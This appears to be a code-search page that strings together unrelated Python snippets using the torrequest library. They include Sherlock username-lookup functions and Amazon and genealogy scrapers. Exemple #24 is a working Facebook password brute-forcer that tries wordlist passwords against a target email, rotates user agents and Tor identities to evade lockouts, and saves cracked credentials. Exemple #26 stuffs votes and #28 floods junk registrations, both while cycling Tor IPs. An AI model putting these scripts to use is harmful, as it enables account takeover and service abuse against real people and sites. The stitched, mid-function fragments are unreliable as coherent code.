            except Exception as e:
                logger.warning(f'Error while parsing {social_network}: {e}',
                               exc_info=True)

            if extracted_ids_data:
                new_usernames = {}
                for k, v in extracted_ids_data.items():
                    if 'username' in k:
                        new_usernames[v] = 'username'
                    if k in supported_recursive_search_ids:
                        new_usernames[v] = k

                results_site['ids_usernames'] = new_usernames
                result.ids_data = extracted_ids_data

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = status_code
        results_site['response_text'] = html_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total
def sherlock(username,
             site_data,
             verbose=False,
             tor=False,
             unique_tor=False,
             proxy=None,
             print_found_only=False,
             timeout=None,
             color=True):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    color                  -- Boolean indicating whether to color terminal output

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    print_info("Checking username", username, color)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = ElapsedFuturesSession(max_workers=max_workers,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            if not print_found_only:
                print_invalid(social_network,
                              "Illegal Username Format For This Site!", color)

            results_site["exists"] = "illegal"
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            results_site['response_time_ms'] = ""
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            #If only the status_code is needed don't download the body
            if net_info["errorType"] == 'status_code':
                request_method = session.head
            else:
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy != None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3,
            color=color)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if not error in r.text:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                #
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "":
            if not print_found_only:
                print_invalid(social_network, "Error!", color)
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
Exemple #22
0
def pageSpr(link):
	dic={}
	ua = UserAgent()
	headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 ua.random'}
	tr=TorRequest(1234)
	tr.reset_identity()
	url=requests.get('https://www.amazon.in/dp/'+str(link)+'?tag=YOURASSOCIATEID', headers=headers).text
	soup=BeautifulSoup(url, 'lxml')
	try:
		if soup.find('h1', id='title').span['id'] == "productTitle":
			xid='productTitle'
		else:
			xid='ebooksProductTitle'
	except (AttributeError, TypeError):
		pass
	try:
		dic["TITLE"]=soup.find('span', id=xid).text
	except (AttributeError, TypeError, UnboundLocalError):
		dic["TITLE"]=" "
		pass
	try:
		dic["AUTHOR"]=soup.find('a', class_='contributorNameID').text
	except (AttributeError, TypeError):
		dic["AUTHOR"]=" "
		pass
	try:
		dic["NO OF REVIEWS"]=soup.find('span', id='acrCustomerReviewText').text
	except (AttributeError, TypeError):
		dic["NO OF REVIEWS"]=" "
		pass
	try:
		dic["RATING"]=soup.find('span', id='acrPopover')['title']
	except (AttributeError, TypeError):
		dic["RATING"]=" "
		pass
	try:
		price=soup.find('div', id='twister').find_all('div', class_='top-level')
	except (AttributeError, TypeError):
		pass
	try:
		for i in price:
			try:
				dic[i.find('span', class_='a-color-base').text]=i.find('span', class_='a-color-price').text
			except (AttributeError, TypeError):
				continue
	except (UnboundLocalError):
		pass
	try:
		prodet=soup.find('div', id='detail_bullets_id').ul.find_all('li')
	except (AttributeError, TypeError, ValueError):
		pass
	try:
		for pro in prodet:
			try:
				prod=str(pro.text).split(" ")
				if len(prod)==2:
					dic[prod[0]]=[prod[1]]
			except (AttributeError, TypeError, ValueError):
				continue
	except (UnboundLocalError):
		pass
	return dic
import tqdm
from multiprocessing import Pool
import numpy as np
from torrequest import TorRequest

from helpers import get_last_number, get_row, tratatu_datuak

hasiera = get_last_number(["bautizo", "hileta", "ezkontza"])
denera = 1_954_537
zati_kop = 1_000

jasotzeko = denera - hasiera
zatiak = [1]
zatiak += [int(jasotzeko / zati_kop)] * zati_kop

if jasotzeko % zati_kop != 0:
    zatiak += [jasotzeko % zati_kop]
zatiak = np.cumsum(zatiak)

for index in tqdm.tqdm(range(len(zatiak) - 1)):
    tr = TorRequest(password='******')

    with Pool(50) as p:
        ids = list(range(zatiak[index] + hasiera, zatiak[index + 1] + hasiera))
        records = p.map(get_row, ids)
        tratatu_datuak(records)
Exemple #24
0
    def login(self):


        try:
            idx = 0
            attempts = 0


            # Get The Session
            if (os.path.isfile(self.get_session_name())):

                option = input(Style.BRIGHT+ Fore.WHITE + "Do you want to open the session %s [Y/n]: " % self.get_session_name())
                if (option == "Yes" or option == "YES" or option == "yes" or option == "y" or option == "Y"):
                    idx = self.get_session()-1

            # Read the lines from the wordlist.
            lines = open(self.words, 'r').readlines()

            # The user agent list
            user_agent_list = [
                # Chrome
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                # Firefox
                'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
                'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'
            ]

            tr = TorRequest()

            # Read the file line by line
            while idx != len(lines):

                if (idx < 0):
                    logging.log("debug", "Renewing the session..")
                    idx = 0

                    # Strip the password
                    password = lines[idx].rstrip()

                else:

                    # Strip the password
                    password = lines[idx].rstrip()


                user_agent = random.choice(user_agent_list)
                headers = {'User-Agent': user_agent}
                logging.log('debug', 'using header %s' % headers)
                logging.print_trying(password)

                try:
                    # Post the payload and get a response back.
                    payload = {
                        'email': self.email,
                        'pass': password,
                    }
                    response = tr.post(self.url, headers=headers, data=payload)
                except:
                    logging.log('warning', 'Connection error')
                    sys.exit(1)


                # Parse the html using BeautifulSoup and grab the title.
                soup = BeautifulSoup(response.content, 'html.parser')
                title = soup.title.string

                # Locked out: When this happens the best thing to do is
                # Save the session and try again later.
                #if ('Facebook' not in title):
                #    self.save_session(idx)
                #   logging.log("info", "LOCKED OUT: Trying again later")
                #   sys.exit(1)

                # Check if the title is 'Facebook' for a successful login.
                if ('Facebook'==title):

                    logging.print_creds(self.email, password)

                    # Save the credentials
                    self.save_creds(self.email, password)
                    break
                    break

                else:

                    # Increase some counters
                    idx += 1
                    attempts += 1
                    tr.reset_identity()

            logging.log("debug", "finished...")

        except KeyboardInterrupt:
            self.save_session(idx)
            sys.exit(1)
Exemple #25
0
def sherlock(username,
             site_data,
             query_notify,
             tor=False,
             unique_tor=False,
             proxy=None,
             timeout=None):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = SherlockFuturesSession(max_workers=max_workers,
                                     session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info["url"].format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True) == True):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_text, expection_text = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network)

        #Get response time for response of our request.
        try:
            response_time = r.elapsed
        except AttributeError:
            response_time = None

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            http_status = "?"
        try:
            response_text = r.text.encode(r.encoding)
        except:
            response_text = ""

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if not error in r.text:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total
Exemple #26
0
ID = int(input("who's the lucky one? : "))
i = int(input("how many times mister?: "))
cookies = {
    'HoldTheDoor': 'f113024b10de77d8031c15bdcf2f830d67773813',
}

headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 OPR/66.0.3515.27',
    'Referer': 'http://158.69.76.135/level4.php',
}

data = {
    'id': ID,
    'holdthedoor': 'Submit',
    'key': 'f113024b10de77d8031c15bdcf2f830d67773813'
}
x = 0
while x < i:
    tr = TorRequest(password='******')
    tr.reset_identity()  #Reset Tor
    response = tr.post('http://158.69.76.135/level4.php',
                       headers=headers,
                       cookies=cookies,
                       data=data,
                       verify=False)
    ip = tr.get('http://ipecho.net/plain')
    print("***********  Identity {} ^_^ ********* \n              {} ".format(
        x + 1, ip.text))
    x += 1
Exemple #27
0
def sherlock(username,
             site_data,
             verbose=False,
             tor=False,
             unique_tor=False,
             proxy=None,
             print_found_only=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL

    Return Value:
    Dictionary containing results from report.  Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    global amount

    print((Style.BRIGHT + Fore.GREEN + "[" + Fore.YELLOW + "*" + Fore.GREEN +
           "] Checking username" + Fore.WHITE + " {}" + Fore.GREEN +
           " on:").format(username))

    # A user agent is needed because some sites don't
    # return the correct information since they think that
    # we are bots
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'
    }

    # Allow 1 thread for each external service, so `len(site_data)` threads total
    executor = ThreadPoolExecutor(max_workers=len(site_data))

    # Create session based on request methodology
    underlying_session = requests.session()
    underlying_request = requests.Request()
    if tor or unique_tor:
        underlying_request = TorRequest()
        underlying_session = underlying_request.session

    # Create multi-threaded session for all requests. Use our custom FuturesSession that exposes response time
    session = ElapsedFuturesSession(executor=executor,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            print((Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" +
                   Fore.WHITE + "]" + Fore.GREEN + " {}:" + Fore.YELLOW +
                   " Illegal Username Format For This Site!"
                   ).format(social_network))
            results_site["exists"] = "illegal"
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url

            request_method = session.get
            if social_network != "GitHub":
                # If only the status_code is needed don't download the body
                if net_info["errorType"] == 'status_code':
                    request_method = session.head

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy != None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects)
            else:
                future = request_method(url=url,
                                        headers=headers,
                                        allow_redirects=allow_redirects)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if not error in r.text:
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if (r.status_code >= 200) and (r.status_code < 300):
                #
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "":
            print((Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" +
                   Fore.WHITE + "]" + Fore.GREEN + " {}:" + Fore.YELLOW +
                   " Error!").format(social_network))
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
Exemple #28
0
# Add C:\...\Tor Browser\Browser\TorBrowser\Tor to the current user's environment variables (Windows 10)
import threading
from random import randint, random

from torrequest import TorRequest
import time
import requests
import json

if __name__ == '__main__':
    print('Python + TOR')

with TorRequest(proxy_port=9150, ctrl_port=9151, password=None) as tr:

    resp = tr.get('http://www.ipecho.net/plain')
    print("Current IP : " + resp.text)

    index_reset = 0

    for i in range(10000):

        index_reset = index_reset+1
        if index_reset > 50:
            index_reset = 0
            tr.reset_identity()
            resp = tr.get('http://www.ipecho.net/plain')
            print("Current IP : " + resp.text)

        data = {}
        data['name'] = str(i) + 1000 * chr(randint(1, 8192))
        data['username'] = 1000 * (chr(randint(65, 90)) + chr(randint(65, 90)) + chr(randint(65, 90))) + str(i) + '@random_domain.com'
Exemple #29
0
from torrequest import TorRequest
from UserAgentList import user_agent_list
import random
from bs4 import BeautifulSoup
from time import sleep
import json

tr = TorRequest()
baseUrl = "http://www.amazon.com/dp/"
data = []


def reset_my_identity(url):
    tr.reset_identity()
    # tr.ctrl.signal('CLEARDNSCACHE')  # see Stem docs for the full API
    #
    # print(type(tr.session))  # a requests.Session object
    # c = cookielib.CookieJar()
    # tr.session.cookies.update(c)
    user_agent = random.choice(user_agent_list)
    headers = {'User-Agent': user_agent}
    page = tr.get(url, headers=headers)
    return page


def get_feature(soup):
    feature_list = []
    features = soup.find(id="feature-bullets")
    if features is None:
        return "None"
    for feature in features.find_all(class_="a-list-item"):
Exemple #30
0
def sherlock(username,
             site_data,
             query_notify,
             tor=False,
             unique_tor=False,
             proxy=None,
             timeout=None,
             ids_search=False,
             id_type='username',
             tags=[]):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    ids_search             -- Search for other usernames in website pages & recursive search by them.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username, id_type)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = SherlockFuturesSession(max_workers=max_workers,
                                     session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # print(id_type) # print(social_network)
        if net_info.get('type', 'username') != id_type:
            continue

        site_tags = set(net_info.get('tags', []))
        if tags:
            if not tags.intersection(site_tags):
                continue

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:55.0) Gecko/20100101 Firefox/55.0',
        }
